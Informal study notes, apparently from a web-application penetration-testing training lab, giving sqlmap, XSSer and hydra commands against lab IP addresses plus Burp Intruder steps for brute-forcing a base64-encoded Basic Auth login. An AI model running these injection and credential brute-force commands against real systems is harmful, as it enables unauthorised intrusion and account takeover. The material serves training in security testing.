- sqlmap -u "http://192.34.161.3/sqli_1.php?title=joe&action=search" --cookie "PHPSESSID=xxxxxx; security_level=0" -p title
- skipped this module...
- Run XSSer with xsser --url http://x.x.x.x/index.php?page=dns-lookup.php -p "xxxxxxxx"
- within the url option, type the whole get request
- the p options specifies the payload (what information did you post to the webserver) and replace your string with XSS
- we need the cookie for authentication!
- In this case, i tested a reflected html injection:
- To perform a bruteforce with hydra check the following:
- Use burp or chrome / firefox inspection to find out what http-method is used (normally POST). See Screenshot:
- when done, check the variables that we need to post to the website. You can do this with burp or Chrome / Firefox -> Inspect element -> Network -> mark connection -> Headers -> Edit and Resend Button (marked in yellow above)
- Check the response of the website when entered a wrong username / password combination. We need that to tell hydra when a login has failed.
- In the trainig, we've used the following command to bruteforce a websites login page:
- hydra -l bee -P /usr/share/wordlists/metasploit/common_passwords.txt 192.229.191.3 http-post-form "/login.php:login=bee&password=^PASS^&security_level=0&form=submit:Invalid credentials"
- Use burp or chrome / firefox inspection to find out what http-method is used (normally POST). See Screenshot:
- This Room was fun. Capture a BASIC Auth request with Burp and take a look at it. Basic Auth is Encoded with Base64. We'll need to send the "Authorization: Basic ...." Variable to the Decoder and see how this is structured. Normally this is username:password. So when we want to attack, we'll send this to the intruder and choose
- payload (if username known, simple list)
- add passwords or load a list
- payload processing: FIRST -> Add Prefix admin: (so the username) and then choose base 64 encoding
- (SEE SCREENSHOT)
- LETS GO!